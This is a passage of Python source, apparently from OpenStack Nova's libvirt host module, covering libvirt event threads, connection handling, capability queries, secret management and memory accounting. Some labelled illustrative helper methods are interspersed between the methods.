"""Return an object wrapped in a tpool.Proxy using autowrap appropriate
for the libvirt module.
"""
# libvirt is not pure python, so eventlet monkey patching doesn't work
# on it. Consequently long-running libvirt calls will not yield to
# eventlet's event loop, starving all other greenthreads until
# completion. eventlet's tpool.Proxy handles this situation for us by
# executing proxied calls in a native thread.
return tpool.Proxy(obj, autowrap=self._libvirt_proxy_classes)
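    # NOTE(editor): the following is an illustrative sketch, not part of
    # nova and never invoked by the driver. It demonstrates the
    # tpool.Proxy/autowrap pattern used above on a hypothetical blocking
    # class: proxied calls run in a native thread, so other greenthreads
    # keep making progress while the call blocks.
    @staticmethod
    def _example_tpool_proxy_sketch():
        import time
        from eventlet import tpool
        class _ExampleBlockingLib(object):
            def slow_call(self):
                time.sleep(1)  # stands in for a long-running native call
                return 'done'
        proxied = tpool.Proxy(_ExampleBlockingLib(),
                              autowrap=(_ExampleBlockingLib,))
        # The calling greenthread yields while the native thread waits.
        return proxied.slow_call()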
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception('Exception handling connection event')
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent when live
# migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# NOTE(mriedem): The job check logic here is copied from
# LibvirtDriver._live_migration_monitor.
guest = libvirt_guest.Guest(dom)
info = guest.get_job_info()
if info.type == libvirt.VIR_DOMAIN_JOB_NONE:
# Either still running, or failed or completed,
# lets untangle the mess.
info.type = libvirt_migrate.find_job_type(
guest, instance=None, logging_ok=False)
if info.type == libvirt.VIR_DOMAIN_JOB_COMPLETED:
transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
# Failed or some other status we don't know about, so just
# opt to report the guest is paused.
transition = virtevent.EVENT_LIFECYCLE_PAUSED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
def _connect(self, uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
return self._libvirt_proxy.openAuth(uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
# required for mypy
if self._event_queue is None:
return
while not self._event_queue.empty():
try:
event_type = ty.Union[
virtevent.LifecycleEvent, ty.Mapping[str, ty.Any]]
event: event_type = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
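    # NOTE(editor): illustrative sketch, not part of nova and never called
    # by the driver. It shows the delay-and-cancel pattern used by
    # _event_emit_delayed() above in isolation: a callback is scheduled a
    # few seconds ahead and cancelled if a newer event supersedes it.
    @staticmethod
    def _example_delayed_emit_sketch():
        from eventlet import greenthread
        emitted = []
        handle = greenthread.spawn_after(15, emitted.append, 'STOPPED')
        # A subsequent STARTED event would cancel the pending emission,
        # just as _event_emit_delayed() does via id_.cancel().
        handle.cancel()
        return emitted  # still empty: the delayed call never ran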
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
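    # NOTE(editor): illustrative sketch, not part of nova and never called
    # by the driver. It shows the self-pipe trick used above in isolation:
    # a producer writes one byte to wake a consumer blocked on the reader
    # end of the pipe.
    @staticmethod
    def _example_self_pipe_sketch():
        import os
        rpipe, wpipe = os.pipe()
        os.write(wpipe, b' ')     # producer: "events are pending"
        woken = os.read(rpipe, 1)  # consumer: blocks until signalled
        os.close(rpipe)
        os.close(wpipe)
        return woken == b' '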
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception("Connection to libvirt failed: %s", ex)
payload = {'ip': CONF.my_ip, 'method': '_connect', 'reason': ex}
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex)
raise exception.HypervisorUnavailable()
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
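    # NOTE(editor): illustrative sketch, not part of nova and never called
    # by the driver. The two helpers above reduce to integer comparisons
    # because oslo.utils packs a dotted version into a single number, e.g.
    # (4, 7, 0) -> 4007000, the same format conn.getLibVersion() returns.
    @staticmethod
    def _example_version_check_sketch():
        from oslo_utils import versionutils
        packed = versionutils.convert_version_to_int((4, 7, 0))
        return packed  # 4007000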
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
# listAllDomains() returns <list of virDomain>, not <virDomain>, so
# tpool.Proxy's autowrap won't catch it. We need to wrap the
# contents of the list we return.
alldoms = (self._wrap_libvirt_proxy(dom)
for dom in self.get_connection().listAllDomains(flags))
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
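    # NOTE(editor): illustrative usage sketch, not part of nova and never
    # called by the driver. The flags above form a plain bitmask, so
    # passing only_running=False simply ORs in the INACTIVE flag and also
    # returns guests that are defined but shut off. ``host`` is assumed to
    # be an initialized Host connected to a live libvirt daemon.
    @staticmethod
    def _example_list_domains_sketch(host):
        running = host.list_instance_domains()
        all_guests = host.list_instance_domains(only_running=False)
        return len(running), len(all_guests)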
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
:returns: set of online CPUs, raises libvirtError on error
"""
cpus, cpu_map, online = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_cpu_model_names(self):
"""Get the cpu models based on host CPU arch
:returns: a list of cpu models which supported by the given CPU arch
"""
arch = self.get_capabilities().host.cpu.arch
return self.get_connection().getCPUModelNames(arch)
@staticmethod
def _log_host_capabilities(xmlstr):
# NOTE(mriedem): This looks a bit weird but we do this so we can stub
# out this method in unit/functional test runs since the xml string is
# big and it can cause subunit parsing to fail (see bug 1813147).
LOG.info("Libvirt host capabilities %s", xmlstr)
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
self._log_host_capabilities(xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
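    # NOTE(editor): illustrative usage sketch, not part of nova and never
    # called by the driver. The parsed capabilities expose the host CPU
    # and NUMA topology as attributes instead of raw XML. ``host`` is
    # assumed to be an initialized Host connected to a live libvirt daemon.
    @staticmethod
    def _example_capabilities_sketch(host):
        caps = host.get_capabilities()          # config.LibvirtConfigCaps
        arch = caps.host.cpu.arch               # e.g. 'x86_64'
        numa_cells = len(caps.host.topology.cells)
        return arch, numa_cells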
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we heed the advice of the experts that it's
typically sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, that's not quite sufficient in the context of nova,
because SEV guests typically require a q35 machine type, as do
KVM/QEMU guests that want Secure Boot, whereas the current
default machine type for x86_64 is 'pc'. So we need results
from the getDomainCapabilities API for at least those two.
Fortunately we can take advantage of the results from the
getCapabilities API which marks selected machine types as
canonical, e.g.:
<machine canonical='pc-i440fx-2.11' maxCpus='255'>pc</machine>
<machine canonical='pc-q35-2.11' maxCpus='288'>q35</machine>
So for now, we call getDomainCapabilities for these canonical
machine types of each architecture, plus for the
architecture's default machine type, if that is not one of the
canonical types.
Future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps: ty.Dict = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
domain = guest.domains.get(virt_type, guest.default_domain)
for machine_type in self._get_machine_types(arch, domain):
# It is expected that if there are multiple <guest>
# elements, each will have a different architecture;
# for example, on x86 hosts one <guest> will contain
# <arch name='i686'> and one will contain <arch
# name='x86_64'>. But it doesn't hurt to add a safety
# net to avoid needlessly calling libvirt's API more
# times than we need.
if machine_type and machine_type in domain_caps[arch]:
continue
self._add_to_domain_capabilities(domain.emulator, arch,
domain_caps, machine_type,
virt_type)
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
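    # NOTE(editor): illustrative usage sketch, not part of nova and never
    # called by the driver. The memoized result is a two-level mapping, so
    # a caller interested in a single (arch, machine type) pair indexes it
    # directly; the arch and machine type below are hypothetical examples
    # and ``host`` is assumed to be an initialized Host.
    @staticmethod
    def _example_domain_caps_sketch(host):
        domain_caps = host.get_domain_capabilities()
        x86_caps = domain_caps.get('x86_64', {})
        # A LibvirtConfigDomainCaps instance, or None if not reported:
        return x86_caps.get('pc-q35-2.11')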
def _get_machine_types(self, arch, domain):
"""Get the machine types for this architecture for which we need to
call getDomainCapabilities, i.e. the canonical machine types,
and the default machine type (if it's not one of the canonical
machine types).
See the docstring for get_domain_capabilities() for an explanation
of why we choose this set of machine types.
"""
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# See _add_to_domain_capabilities() below for how this is handled.
mtypes = set([libvirt_utils.get_default_machine_type(arch)])
mtypes.update(domain.aliases.keys())
LOG.debug("Getting domain capabilities for %(arch)s via "
"machine types: %(mtypes)s",
{'arch': arch, 'mtypes': mtypes})
return mtypes
def _add_to_domain_capabilities(self, emulator_bin, arch, domain_caps,
machine_type, virt_type):
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# In that case we pass a machine_type of None to the libvirt
# API and rely on it choosing a sensible default which will be
# returned in the <machine> element. It could also be an
# alias like 'pc' rather than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked its
# default machine type for x86, 'pc', as reported by QEMU's
# default. From libvirt v4.7.0 onwards, libvirt _explicitly_
# declared the "preferred" default for x86 as 'pc' (and
# appropriate values for other architectures), and only uses
# QEMU's reported default (whatever that may be) if 'pc' does
# not exist. This was done "to isolate applications from
# hypervisor changes that may cause incompatibilities" --
# i.e. if, or when, QEMU changes its default machine type to
# something else. Refer to this libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
            # if the machine type has already been recorded.
if arch in domain_caps:
domain_caps.pop(arch)
return
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None, uuid=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd', 'volume', 'vtpm'.
'rbd' will be converted to 'ceph'. 'vtpm' secrets
are private and ephemeral; others are not.
:param usage_id: name of resource in secret
        :param password: secret value to set
:param uuid: optional UUID of the secret; else one is generated by
libvirt
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = usage_type == 'vtpm'
secret_conf.private = usage_type == 'vtpm'
secret_conf.usage_id = usage_id
secret_conf.uuid = uuid
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
elif usage_type == 'vtpm':
secret_conf.usage_type = 'vtpm'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
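    # NOTE(editor): illustrative usage sketch, not part of nova and never
    # called by the driver. A typical round trip for the secret helpers:
    # define a Ceph/RBD secret, look it up again, then remove it. The
    # usage id and password are hypothetical values and ``host`` is
    # assumed to be an initialized Host connected to a live libvirt daemon.
    @staticmethod
    def _example_secret_sketch(host):
        host.create_secret('rbd', 'client.nova-example',
                           password='example-passphrase')
        found = host.find_secret('rbd', 'client.nova-example')
        host.delete_secret('rbd', 'client.nova-example')
        return found is not None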
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
        If include_host is True, subtract available host memory from guest 0
        to get the memory actually used inside dom0 (on xen)
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
